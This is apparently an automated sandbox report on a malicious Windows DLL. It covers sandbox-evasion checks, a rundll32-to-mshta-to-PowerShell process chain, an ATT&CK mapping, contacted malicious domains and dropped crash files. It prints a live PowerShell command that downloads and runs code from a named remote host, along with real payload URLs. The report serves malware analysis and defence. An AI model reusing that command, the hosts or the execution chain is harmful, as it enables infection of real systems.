Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724 Thread sleep count: 4614 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7744 Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000
Source: Amcache.hve.8.dr Binary or memory string: VMware
Source: mshta.exe, 0000000D.00000003.2045776255.0000000000866000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\NC
Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual USB Mouse
Source: rundll32.exe, 0000000C.00000002.2040242561.000002AC3A7CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWz
Source: Amcache.hve.8.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr Binary or memory string: VMware, Inc.
Source: rundll32.exe, 00000012.00000002.2067605540.000001B9DE8EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.8.dr Binary or memory string: VMware20,1hbin@
Source: rundll32.exe, 0000000C.00000002.2040242561.000002AC3A7CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: Amcache.hve.8.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 0000000C.00000002.2040242561.000002AC3A84F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.8.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.8.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: rundll32.exe, 00000012.00000002.2067605540.000001B9DE888000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.8.dr Binary or memory string: vmci.sys
Source: Amcache.hve.8.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.8.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: rundll32.exe, 0000000C.00000002.2040536110.000002AC3C820000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\$S 8
Source: Amcache.hve.8.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe Network Connect: 194.124.213.167 443
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: Amcache.hve.8.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.dr Binary or memory string: MsMpEng.exe
MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the badge the report shows next to that technique)

  • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
  • Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
  • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
  • Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
  • Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
  • Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
  • Defense Evasion: 1 Masquerading; 31 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Rundll32; 1 DLL Side-Loading; Steganography
  • Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
  • Discovery: 21 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 12 System Information Discovery
  • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
  • Collection: 1 Email Collection; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
  • Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
  • Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph ID: 1445895 | Sample: UPazTgVGA7.exe | Startdate: 22/05/2024 | Architecture: WINDOWS | Score: 76
Contacted domains: siguefutbol.com, www.siguefutbol.com, iapartmentlistings.com
Signatures on the sample: Antivirus detection for URL or domain; Machine Learning detection for sample; Sigma detected: Suspicious MSHTA Child Process; 3 other signatures
Process tree (from the behavior graph):
  • loaddll64.exe
    • rundll32.exe -> siguefutbol.com (194.124.213.167, ports 443, 49706, SOLNETCH, country unknown); signature: System process connects to network (likely due to code injection or exploit)
      • mshta.exe
        • powershell.exe -> iapartmentlistings.com (91.222.173.38, ports 49713, 49716, 49733, KICUA-ASGI, Ukraine)
          • conhost.exe
    • rundll32.exe
      • mshta.exe
        • powershell.exe
          • conhost.exe
    • cmd.exe
      • rundll32.exe
        • WerFault.exe
    • 3 other processes
      • WerFault.exe
      • WerFault.exe
Source | Detection | Scanner | Label | Link
UPazTgVGA7.dll | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://upx.sf.net | 0% | URL Reputation | safe |
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtf | 100% | Avira URL Cloud | malware |
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt?M;( | 100% | Avira URL Cloud | malware |
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmshtaopen72be476187889df5a41b67e836 | 100% | Avira URL Cloud | malware |
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtg | 100% | Avira URL Cloud | malware |
http://iapartmentlistings.com/tykhwuxk | 100% | Avira URL Cloud | malware |
https://www.siguefutbol.com/f= | 0% | Avira URL Cloud | safe |
https://www.siguefutbol.com/ | 0% | Avira URL Cloud | safe |
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtLMEM | 100% | Avira URL Cloud | malware |
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt | 100% | Avira URL Cloud | malware |
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txth | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
iapartmentlistings.com | 91.222.173.38 | true | true | | unknown
siguefutbol.com | 194.124.213.167 | true | true | | unknown
www.siguefutbol.com | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://iapartmentlistings.com/tykhwuxk | false | Avira URL Cloud: malware | unknown
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtg | rundll32.exe, 00000012.00000002.2067605540.000001B9DE888000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://upx.sf.net | Amcache.hve.8.dr | false | URL Reputation: safe | unknown
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt?M;( | rundll32.exe, 0000000C.00000002.2040242561.000002AC3A833000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtf | rundll32.exe, 00000012.00000002.2067605540.000001B9DE880000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtLMEM | rundll32.exe, 00000012.00000002.2067605540.000001B9DE938000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.siguefutbol.com/ | rundll32.exe, 0000000C.00000002.2040242561.000002AC3A833000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.siguefutbol.com/f= | rundll32.exe, 0000000C.00000002.2040242561.000002AC3A833000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txth | rundll32.exe, 00000012.00000002.2067605540.000001B9DE880000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmshtaopen72be476187889df5a41b67e836 | rundll32.exe, 00000003.00000002.2194404409.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2207076977.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000011.00000002.2180195670.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, UPazTgVGA7.dll | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
194.124.213.167 | siguefutbol.com | unknown | 9044 | SOLNETCH | true
91.222.173.38 | iapartmentlistings.com | Ukraine | 39249 | KICUA-ASGI | true
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1445895
        Start date and time:2024-05-22 18:06:05 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 41s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:27
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:UPazTgVGA7.dll
        (renamed file extension from exe to dll, renamed because original name is a hash value)
        Original Sample Name:e3493cc788d91b70277729ea748cce0d.exe
        Detection:MAL
        Classification:mal76.evad.winDLL@27/21@2/2
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 3
        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 20.42.73.29
        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target rundll32.exe, PID 3504 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: UPazTgVGA7.dll
Time | Type | Description
12:06:57 | API Interceptor | 2x Sleep call for process: mshta.exe modified
12:06:58 | API Interceptor | 1x Sleep call for process: loaddll64.exe modified
12:06:58 | API Interceptor | 5916x Sleep call for process: powershell.exe modified
12:07:11 | API Interceptor | 3x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
91.222.173.38 | d.hta | malicious | Unknown | iapartmentlistings.com/tykhwuxk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
iapartmentlistings.com | d.hta | malicious | Unknown | 91.222.173.38
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SOLNETCH | 8DR4MV2b0i.elf | malicious | Mirai | 212.101.2.142
| vniiXJivdo.elf | malicious | Mirai | 212.41.74.143
| cqf3hb5Qxg.elf | malicious | Mirai | 212.41.74.181
| 2cO52KdAG9.elf | malicious | Mirai | 212.41.74.154
| Ctnox9WBxZ.elf | malicious | Unknown | 212.41.74.185
| XXsOGfMoub.elf | malicious | Mirai, Gafgyt | 82.220.184.229
| mUP7fvcqLi.elf | malicious | Mirai | 212.41.74.182
| uA97EyP1li.elf | malicious | Mirai | 82.220.236.164
| LIL2hLY8io.elf | malicious | Mirai | 212.41.74.189
| 62CajT4n8H.elf | malicious | Unknown | 82.220.65.40
KICUA-ASGI | d.hta | malicious | Unknown | 91.222.173.38
| umkglnks.ps1 | malicious | DarkGate, MailPassView | 91.222.173.186
| 1.hta | malicious | DarkGate, MailPassView | 91.222.173.186
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | FRA.0038253.exe | malicious | FormBook, GuLoader | 194.124.213.167
| Factura_pdf.exe | malicious | GuLoader | 194.124.213.167
| file.exe | malicious | Vidar | 194.124.213.167
| Zahlungsbest#U00e4tigung und Rechnung_pdf.bat | malicious | FormBook, GuLoader | 194.124.213.167
| waybillDoc_20052024.exe | malicious | FormBook, GuLoader | 194.124.213.167
| 101764ZAM2024.vbs | malicious | AgentTesla, GuLoader | 194.124.213.167
| Twrchtrywth.exe | malicious | FormBook, GuLoader | 194.124.213.167
| SKIIP 83EC125T1 22-0-05-24RQ.vbs | malicious | AgentTesla, GuLoader | 194.124.213.167
| New Voicemail Invoice 64746w .js | malicious | WSHRAT | 194.124.213.167
| file.exe | malicious | Vidar | 194.124.213.167
        No context
        Process:C:\Windows\System32\WerFault.exe
        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Category:dropped
        Size (bytes):65536
        Entropy (8bit):0.8062069614466518
        Encrypted:false
        SSDEEP:96:XgFU0eziiyKy8dsja4Rv57qhK6tQXIDcQnc6PcEwcw35XaXz+HbHgSQgJjBuUXqU:wFSiiyMFk0ZLKdjDuzuiFsZ24lO84
        MD5:2931A063291E1DCC35A3FF85E0415EBA
        SHA1:663459B1671B06C30CC49A11F943C3A5365EA24F
        SHA-256:FE8D49F3092898D25C087AB8E05C7A7FCC39EC20FD4674B707E136D6A2FF0E40
        SHA-512:5D010B1B97EC222EB7581C82CAA997BD2FB0B1DD793D4424123A2C37864E7B020AE18E458D66C9EA19D43BA51D58C714128CBD2F3D46C4373E7E70BC668AEC44
        Malicious:false
        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.8.6.7.6.1.3.1.5.1.7.1.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.8.6.7.6.1.3.5.8.9.2.1.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.6.7.4.f.4.a.-.1.c.4.1.-.4.5.8.8.-.8.6.0.5.-.c.8.9.a.e.3.1.3.7.8.3.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.f.c.4.f.0.e.f.-.a.6.c.3.-.4.4.0.e.-.b.5.9.7.-.c.f.9.5.a.2.4.0.e.d.9.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.U.P.a.z.T.g.V.G.A.7...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.6.c.-.0.0.0.1.-.0.0.1.4.-.3.2.1.f.-.7.8.0.f.6.2.a.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.8.2.2.2.!.
        Process:C:\Windows\System32\WerFault.exe
        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Category:dropped
        Size (bytes):65536
        Entropy (8bit):0.8032715490544936
        Encrypted:false
        SSDEEP:96:vGFpwFkziwyKyUsja4Rv57qhK6tQXIDcQnc6PcEwcw35XaXz+HbHgSQgJjBuUXqH:OxiwyUFk0ZLKdjDuzuiFsZ24lO84
        MD5:D573C3829AEFBABF48F5BFB3B8237317
        SHA1:B4C45A6A211DBE8ED504732652D6132B18F241AA
        SHA-256:4588FFE464B220EF7DA3D98C315966760705DC21FC7A99FB454DD38EC3508C33
        SHA-512:3774B13139B77D2BE0B233FD9B7DFFC987033A703FE31579F53086088AB79CE204CCC55D6F906F93BEB5F274E2B638EDFA4D457E59A686BAA462DF14563D879C
        Malicious:false
        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.8.6.7.6.1.9.5.0.4.7.7.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.8.6.7.6.2.0.0.9.8.5.3.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.a.9.a.7.b.9.-.2.5.b.e.-.4.2.1.4.-.9.1.f.e.-.7.d.0.1.e.7.e.c.8.9.9.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.b.a.6.b.5.9.-.0.1.d.9.-.4.9.7.4.-.a.e.f.3.-.6.8.c.f.a.9.8.2.5.d.f.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.U.P.a.z.T.g.V.G.A.7...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.d.0.-.0.0.0.1.-.0.0.1.4.-.a.7.f.4.-.1.0.1.3.6.2.a.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.8.2.2.2.!.
        Process:C:\Windows\System32\WerFault.exe
        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Category:dropped
        Size (bytes):65536
        Entropy (8bit):0.806245361171172
        Encrypted:false
        SSDEEP:96:QuFa2nzixyKyFsja4Rv57qhK6tQXIDcQnc6PcEwcw35XaXz+HbHgSQgJjBuUXqO+:/Q2zixyFFk0ZLKdjDuzuiFsZ24lO84
        MD5:FFC0EB8913F00096B7D7FDA35530CC7F
        SHA1:93439850F2AEDA604487C6D22AA66B1C3662FD67
        SHA-256:FDA30AF1A73EECC3251C5637C10E3F22C79BAE13F181D48380BBFB7B9AB1B130
        SHA-512:140D166486F5A9DEAA71A6A0B5F0E0BCEA3ABF10A20E09D7BD2010F6C31808EAAC68701AAE43879014D7A32DE1DD6B1E8A6F211FA2F469B2EA8DCB468BB565D8
        Malicious:false
        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.8.6.7.6.1.3.1.1.5.5.1.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.8.6.7.6.1.3.5.8.4.2.6.6.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.f.a.3.f.8.1.-.0.4.c.c.-.4.3.5.e.-.8.1.b.7.-.4.0.0.1.b.f.c.4.8.8.7.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.5.b.d.b.b.2.-.3.d.3.9.-.4.c.9.9.-.8.1.1.6.-.9.1.e.9.c.e.d.c.1.c.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.U.P.a.z.T.g.V.G.A.7...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.b.0.-.0.0.0.1.-.0.0.1.4.-.d.b.9.f.-.7.6.0.f.6.2.a.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.8.2.2.2.!.
        Process:C:\Windows\System32\WerFault.exe
        File Type:Mini DuMP crash report, 14 streams, Wed May 22 16:06:59 2024, 0x1205a4 type
        Category:dropped
        Size (bytes):57162
        Entropy (8bit):1.6561364730881172
        Encrypted:false
        SSDEEP:96:5A8MGFkG2nZvM4lNPVasuuFxHuwoi7MMU14cQj/8KWuTQY9uX+rKWI1jIBY5jCxo:tvkwOMMu4cQj/8csYd0jCdImS
        MD5:77C9492D6FCE30A2485484DD305C6357
        SHA1:A6AE1569D553FC10C6065CD7836C1B0E2BB1B267
        SHA-256:D371A3965A6E022105B750F5D0F598F13F11B130045881F239ED18C4BFA0819B
        SHA-512:837EC87C1F7C8AC8D013255CC4A1079E25E842902F9F5EE00005B2169C5B30E947440AE009E2AF811C4793CF98E0F76D514F6DC92C5A3765FF88607330DBDB58
        Malicious:false
        Preview:MDMP..a..... .......#.Nf........................h................+..........T.......8...........T.......................................................................................................................eJ..............Lw......................T...........".Nf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Windows\System32\WerFault.exe
        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Category:dropped
        Size (bytes):8582
        Entropy (8bit):3.6934623016501518
        Encrypted:false
        SSDEEP:192:R6l7wVeJQdC6YaotgmfrSQprp89bOrkfGam:R6lXJKC6YNtgmfrSzOofi
        MD5:7104251B5CF5279FAFF29DE2168B47ED
        SHA1:CAC2905B46C2A32F1D8E5DE78AADC2FA41F2D33F
        SHA-256:8B19D2D9A67344F8AF12E67FB492C619806056CC712A422F1ED84F21D9F386DB
        SHA-512:6FB86CAA9AD2BDF695F6106256FD363392C1FB7AE06BD063A9C485041649EF4FDB2A9E2AA76C07B611522E8FA95622DD2621F717065CA8188A976CB0C6E20F1C
        Malicious:false
